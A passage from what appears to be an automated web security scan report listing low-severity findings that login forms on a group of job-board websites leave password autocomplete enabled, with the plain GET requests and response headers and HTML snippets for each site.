Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:21 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:21 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119431

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.pharmaceuticalcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.96. http://www.physicalsecuritycrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.physicalsecuritycrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.physicalsecuritycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:52 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=gi8upuba219celoic2370527h4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:52 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:52 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106914

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.physicalsecuritycrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.97. http://www.physicaltherapycrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.physicaltherapycrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.physicaltherapycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:16 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=05qenp73ui9sja89hqooo6u8d1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:25:16 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:25:16 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116104

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.physicaltherapycrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.98. http://www.planningcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.planningcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.planningcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:11 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=m7mcbdpiiljbvgpgqr9pv8mf76; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:11 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:11 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 108598

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.planningcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.99. http://www.postdoctoralfellowcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.postdoctoralfellowcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.postdoctoralfellowcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:38 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=4oc28cbo738q50s3ji82u7eki6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:39 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 102645

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.postdoctoralfellowcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.100. http://www.prcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.prcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.prcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:35 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=b4uv8543vsma7m3i4v2d0i48g1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:35 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 120302

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.prcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.101. http://www.preferredresumes.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.preferredresumes.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.preferredresumes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:29 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=tig2sucmmp7tj371vs9tftefe3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83027

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
   <title>Resume Writing Services, Professional Resume Writing, Cover Letter Writing
...[SNIP]...
</script>

<form name="formlogin" action="/index.php" method="POST" onsubmit="return Login()">
<input type=hidden name="clslogin_hdnaction" id="clslogin_hdnaction" value="">
...[SNIP]...
<td align="right"><input type="Password" name="clslogin_password" size="25" class="inputbox" onfocus="focusval(this.value,'Password')" onblur="blurval('Password')" value="Password"></td>
...[SNIP]...

11.102. http://www.procurementcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.procurementcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.procurementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:39 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=mr66qa0ivqt5goom135g89nlu2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 101019

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.procurementcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.103. http://www.productmanagercrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.productmanagercrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.productmanagercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:48 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=l5s6qlvjn27hh7eesjabq2c214; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:48 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106086

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.productmanagercrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.104. http://www.projectmanagementcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.projectmanagementcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.projectmanagementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:19 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=k77p330j68s603hksj5he5k7t6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:19 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119200

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.projectmanagementcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.105. http://www.publicinterestcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.publicinterestcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.publicinterestcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:34 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=d0md3kboqphlouu186urplhea4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:34 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 104328

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.publicinterestcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.106. http://www.publishingcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.publishingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.publishingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=hjafrla8sm0vjpuuvbsqohvh76; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114373

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.publishingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.107. http://www.purchasingcrossing.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.purchasingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.purchasingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:11 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=jp7jhr7hfsn4u1q0tf9pujn7l0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:11 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 105391

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
